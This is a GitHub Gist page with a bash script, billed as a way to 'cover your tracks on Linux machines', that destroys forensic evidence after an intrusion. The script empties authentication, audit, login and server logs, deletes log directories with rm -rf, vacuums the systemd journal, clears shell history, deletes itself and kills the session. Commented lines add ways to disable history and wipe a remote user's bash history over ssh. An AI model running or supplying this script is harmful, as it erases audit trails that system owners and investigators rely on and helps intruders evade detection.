-
-
Save QIWIINFO/836851e0dc96e259457aff9c9f5b6324 to your computer and use it in GitHub Desktop.
Cover your tracks on Linux machines! Article: https://samy.link/blog/is-professional-hackers-also-excellent-magicians
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Author: Naqwada (RuptureFarm 1029) <naqwada@pm.me> | |
# License: MIT License (http://www.opensource.org/licenses/mit-license.php) | |
# Docs: https://gitlab.com/-/snippets/2150636 | |
# Website: http://samy.link/ | |
# Linkedin: https://www.linkedin.com/in/samy-younsi/ | |
# Note: FOR EDUCATIONAL PURPOSE ONLY. | |
#!/bin/bash | |
LOGS_FILES=( | |
/var/log/audit/audit.log # Audit TTY input | |
/var/log/auth.log # Authenication logs | |
/var/log/boot.log # System boot log | |
/var/log/cron.log # Crond logs | |
/var/log/faillog # Faillog records | |
/var/log/httpd # Apache access and error logs directory | |
/var/log/kern.log # Kernel logs | |
/var/log/lastlog # Last Login | |
/var/log/lighttpd # Lighttpd access and error logs directory | |
/var/log/maillog # Mail server logs | |
/var/log/messages # General message and system related stuff | |
/var/log/mysqld.log # MySQL database server log file | |
/var/log/qmail # Qmail log directory | |
/var/log/secure # Authentication log | |
/var/log/system.log # System Log | |
/var/log/tallylog # Tally Log | |
/var/log/utmp # Login records file | |
/var/log/wtmp # Login records file | |
/var/log/yum.log # Yum command log file | |
) | |
function clearLogs () { | |
for i in "${LOGS_FILES[@]}" | |
do | |
if [ -f "$i" ]; then | |
if [ -w "$i" ]; then | |
echo "" > "$i" | |
echo "[+] $i cleaned." | |
else | |
echo "[!] $i is not writable! Retry using sudo." | |
fi | |
elif [ -d "$i" ]; then | |
if [ -w "$i" ]; then | |
rm -rf "${i:?}"/* | |
echo "[+] $i cleaned." | |
else | |
echo "[!] $i is not writable! Retry using sudo." | |
fi | |
fi | |
done | |
} | |
function clearJournalctl () { | |
if [ "$EUID" -ne 0 ] | |
then | |
journalctl --vacuum-time=3h | |
fi | |
} | |
function selfDestructing () { | |
rm $0 | |
} | |
function clearHistory () { | |
#Clear history for current session and make sure the changes are written to disk. | |
history -cw | |
} | |
function bye () { | |
#kill command to exit the session without saving history | |
kill -9 $$ | |
} | |
clearLogs | |
clearJournalctl | |
clearHistory | |
selfDestructing | |
bye | |
# -- Additional commands -- | |
# Disable history for current shell session | |
# HISTFILE=/dev/null | |
# Don't save commands in bash history (only for current session) | |
# ssh user@hostname.domain "> ~/.bash_history" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment